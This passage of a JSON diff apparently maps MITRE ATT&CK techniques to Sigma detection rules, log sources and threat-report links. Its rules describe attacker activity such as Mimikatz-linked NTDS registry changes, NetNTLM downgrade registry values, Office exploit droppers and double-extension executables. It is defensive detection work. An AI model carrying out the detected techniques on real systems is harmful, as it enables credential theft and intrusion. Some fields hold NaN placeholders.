"2019/10/16", + "references": [ + "https://blog.xpnsec.com/exploring-mimikatz-part-1/", + "https://twitter.com/SBousseaden/status/1183745981189427200" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": [ + 12, + 13 + ], + "TargetObject": [ + "*\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt*", + "*\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt*" + ] + }, + "condition": "selection" + }, + "tags": [ + "attack.execution", + "attack.t1177" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "DLL monitoring" + ], + [ + "Loaded DLLs" + ], + [ + "Sysmon - ID 6", + "Kernel drivers" + ], + [ + "API monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "Sysmon ID 7", + "Loaded DLLs" + ], + [ + "Sysmon - ID 6", + "Kernel drivers" + ], + [ + "API monitoring" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1078", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "Admin User Remote Logon", + "id": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", + "description": "Detect remote login by Administrator user depending on internal pattern", + "references": [ + "https://car.mitre.org/wiki/CAR-2016-04-005" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1078", + "car.2016-04-005" + ], + "status": "experimental", + "author": "juju4", + "logsource": { + "product": "windows", + "service": "security", + "definition": "Requirements: Identifiable administrators usernames (pattern or special unique character. ex: \"Admin-*\"), internal policy mandating use only as secondary account" + }, + "detection": { + "selection": { + "EventID": 4624, + "LogonType": 10, + "AuthenticationPackageName": "Negotiate", + "AccountName": "Admin-*" + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate administrative activity" + ], + "level": "low" + }, + { + "title": "Enabled User Right in AD to Control User Objects", + "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "tags": [ + "attack.privilege_escalation", + "attack.t1078" + ], + "references": [ + "https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/" + ], + "author": "@neu5ron", + "logsource": { + "product": "windows", + "service": "security", + "definition": "Requirements: Audit Policy : Policy Change > Audit Authorization Policy Change, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\Policy Change\\Audit Authorization Policy Change" + }, + "detection": { + "selection": { + "EventID": 4704 + }, + "keywords": { + "Message": [ + "*SeEnableDelegationPrivilege*" + ] + }, + "condition": "all of them" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Account Tampering - Suspicious Failed Logon Reasons", + "id": "9eb99343-d336-4020-a3cd-67f3819e68ee", + "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", + "author": "Florian Roth", + "modified": "2019/03/01", + "references": [ + "https://twitter.com/SBousseaden/status/1101431884540710913" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": [ + 4625, + 4776 + ], + "Status": [ + "0xC0000072", + "0xC000006F", + "0xC0000070", + "0xC0000413", + "0xC000018C", + "0xC000015B" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "User using a disabled account" + ], + "level": "high" + }, + { + "title": "Multiple Failed Logins with Different Accounts from Single Source System", + "id": "e98374a6-e2d9-4076-9b5c-11bdb2569995", + "description": "Detects suspicious failed logins with different user accounts from a single source system", + "author": "Florian Roth", + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection1": { + "EventID": [ + 529, + 4625 + ], + "UserName": "*", + "WorkstationName": "*" + }, + "selection2": { + "EventID": 4776, + "UserName": "*", + "Workstation": "*" + }, + "timeframe": "24h", + "condition": [ + "selection1 | count(UserName) by WorkstationName > 3", + "selection2 | count(UserName) by Workstation > 3" + ] + }, + "falsepositives": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "level": "medium" + }, + { + "title": "Interactive Logon to Server Systems", + "id": "3ff152b2-1388-4984-9cd9-a323323fdadf", + "description": "Detects interactive console logons to", + "author": "Florian Roth", + "tags": [ + "attack.lateral_movement", + "attack.t1078" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": [ + 528, + 529, + 4624, + 4625 + ], + "LogonType": 2, + "ComputerName": [ + "%ServerSystems%", + "%DomainControllers%" + ] + }, + "filter": { + "LogonProcessName": "Advapi", + "ComputerName": "%Workstations%" + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Administrative activity via KVM or ILO board" + ], + "level": "medium" + }, + { + "title": "User Added to Local Administrators", + "id": "c265cf08-3f99-46c1-8d59-328247057d57", + "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", + "status": "stable", + "author": "Florian Roth", + "tags": [ + "attack.privilege_escalation", + "attack.t1078" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4732 + }, + "selection_group1": { + "GroupName": "Administrators" + }, + "selection_group2": { + "GroupSid": "S-1-5-32-544" + }, + "filter": { + "SubjectUserName": "*$" + }, + "condition": "selection and (1 of selection_group*) and not filter" + }, + "falsepositives": [ + "Legitimate administrative activity" + ], + "level": "medium" + }, + [ + "4624", + "Authentication logs" + ], + [ + "4688", + "Process Execution" + ], + [ + "4624", + "Authentication logs" + ], + [ + "4688", + "Process Execution" + ], + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://www.rsaconference.com/writable/presentations/file_upload/hta-f02-detecting-and-responding-to-advanced-threats-within-exchange-environments.pdf", + "http://blog.cassidiancybersecurity.com/post/2014/07/The-Eye-of-the-Tiger2", + "https://www.justice.gov/file/1080281/download", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks", + "https://www.youtube.com/watch?v=fevGZs0EQu8", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf", + "http://www.secureworks.com/resources/blog/living-off-the-land/", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.brighttalk.com/webcast/10703/275683", + "https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/", + "https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1211", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "Droppers exploiting CVE-2017-11882", + "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "status": "experimental", + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", + "references": [ + "https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100", + "https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw" + ], + "author": "Florian Roth", + "date": "2017/11/23", + "tags": [ + "attack.defense_evasion", + "attack.t1211" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": "*\\EQNEDT32.EXE" + }, + "condition": "selection" + }, + "fields": [ + "CommandLine" + ], + "falsepositives": [ + "unknown" + ], + "level": "critical" + }, + { + "title": "Microsoft Malware Protection Engine Crash", + "id": "6c82cf5c-090d-4d57-9188-533577631108", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "tags": [ + "attack.defense_evasion", + "attack.t1089", + "attack.t1211" + ], + "status": "experimental", + "date": "2017/05/09", + "references": [ + "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", + "https://technet.microsoft.com/en-us/library/security/4022344" + ], + "author": "Florian Roth", + "logsource": { + "product": "windows", + "service": "application" + }, + "detection": { + "selection1": { + "Source": "Application Error", + "EventID": 1000 + }, + "selection2": { + "Source": "Windows Error Reporting", + "EventID": 1001 + }, + "keywords": { + "Message": [ + "*MsMpEng.exe*", + "*mpengine.dll*" + ] + }, + "condition": "1 of selection* and all of keywords" + }, + "falsepositives": [ + "MsMpEng.exe can crash when C:\\ is full" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "1000", + "1001", + "Windows Error Reporting" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "1000", + "1001", + "Windows Error Reporting" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [ + "https://www.justice.gov/file/1080281/download", NaN + ] + }, + { + "technique_id": "T1203", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "Exploit for CVE-2017-8759", + "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", + "references": [ + "https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", + "https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100" + ], + "tags": [ + "attack.execution", + "attack.t1203" + ], + "author": "Florian Roth", + "date": "2017/09/15", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": "*\\WINWORD.EXE", + "Image": "*\\csc.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Anti-virus" + ], + [ + "System calls" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Anti-virus" + ], + [ + "System calls" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [ + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf", + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/", + "https://securelist.com/the-dropping-elephant-actor/75328/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", + "https://www.riskiq.com/blog/labs/cobalt-strike/", + "https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target", + "https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf", + "https://securelist.com/operation-daybreak/75100/", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", NaN + ] + }, + { + "technique_id": "T1193", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "Suspicious HWP Sub Processes", + "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "status": "experimental", + "references": [ + "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", + "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", + "https://twitter.com/cyberwar_15/status/1187287262054076416", + "https://blog.alyac.co.kr/1901", + "https://en.wikipedia.org/wiki/Hangul_(word_processor)" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.initial_access", + "attack.t1059", + "attack.t1202", + "attack.t1193", + "attack.g0032" + ], + "author": "Florian Roth", + "date": "2019/10/24", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": "*\\Hwp.exe", + "Image": "*\\gbb.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Suspicious Double Extension", + "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "references": [ + "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html", + "https://twitter.com/blackorbird/status/1140519090961825792" + ], + "author": "Florian Roth (rule), @blu3_team (idea)", + "date": "2019/06/26", + "tags": [ + "attack.initial_access", + "attack.t1193" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*.doc.exe", + "*.docx.exe", + "*.xls.exe", + "*.xlsx.exe", + "*.ppt.exe", + "*.pptx.exe", + "*.rtf.exe", + "*.pdf.exe", + "*.txt.exe", + "* .exe", + "*______.exe" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "title": "Execution in Outlook Temp Folder", + "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", + "status": "experimental", + "description": "Detects a suspicious program execution in Outlook temp folder", + "author": "Florian Roth", + "date": "2019/10/01", + "tags": [ + "attack.initial_access", + "attack.t1193" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\Temporary Internet Files\\Content.Outlook\\\\*" + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "Packet capture" + ], + [ + "Mail server" + ], + [ + "Network intrusion detection system" + ], + [ + "Detonation chamber" + ], + [ + "Email gateway" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "Packet capture" + ], + [ + "Mail server" + ], + [ + "Network intrusion detection system" + ], + [ + "Detonation chamber" + ], + [ + "Email gateway" + ] + ], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html", + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf", + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://securelist.com/the-dropping-elephant-actor/75328/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/", + "https://www.justice.gov/opa/press-release/file/1121706/download", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www.justice.gov/file/1080281/download", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-darkhydrus-uses-phishery-harvest-credentials-middle-east/", + "https://www.riskiq.com/blog/labs/cobalt-strike/", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://www.justice.gov/opa/press-release/file/1084361/download", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://securelist.com/darkhotels-attacks-in-2015/71713/", + "https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target", + "https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.group-ib.com/blog/cobalt", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + "https://www.secureworks.com/research/the-curious-case-of-mia-ash", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://securelist.com/muddywater/88059/", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/" + ] + }, + { + "technique_id": "T1212", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "action": "global", + "title": "NetNTLM Downgrade Attack", + "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "description": "Detects post exploitation using NetNTLM downgrade attacks", + "references": [ + "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks" + ], + "author": "Florian Roth", + "date": "2018/03/20", + "tags": [ + "attack.credential_access", + "attack.t1212" + ], + "detection": { + "condition": "1 of them" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection1": { + "EventID": 13, + "TargetObject": [ + "*SYSTEM\\\\*ControlSet*\\Control\\Lsa\\lmcompatibilitylevel", + "*SYSTEM\\\\*ControlSet*\\Control\\Lsa\\NtlmMinClientSec", + "*SYSTEM\\\\*ControlSet*\\Control\\Lsa\\RestrictSendingNTLMTraffic" + ] + } + } + }, + { + "logsource": { + "product": "windows", + "service": "security", + "definition": "Requirements: Audit Policy : Object Access > Audit Registry (Success)" + }, + "detection": { + "selection2": { + "EventID": 4657, + "ObjectName": "\\REGISTRY\\MACHINE\\SYSTEM\\\\*ControlSet*\\Control\\Lsa", + "ObjectValueName": [ + "LmCompatibilityLevel", + "NtlmMinClientSec", + "RestrictSendingNTLMTraffic" + ] + } + } + }, + { + "title": "Kerberos Manipulation", + "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", + "author": "Florian Roth", + "tags": [ + 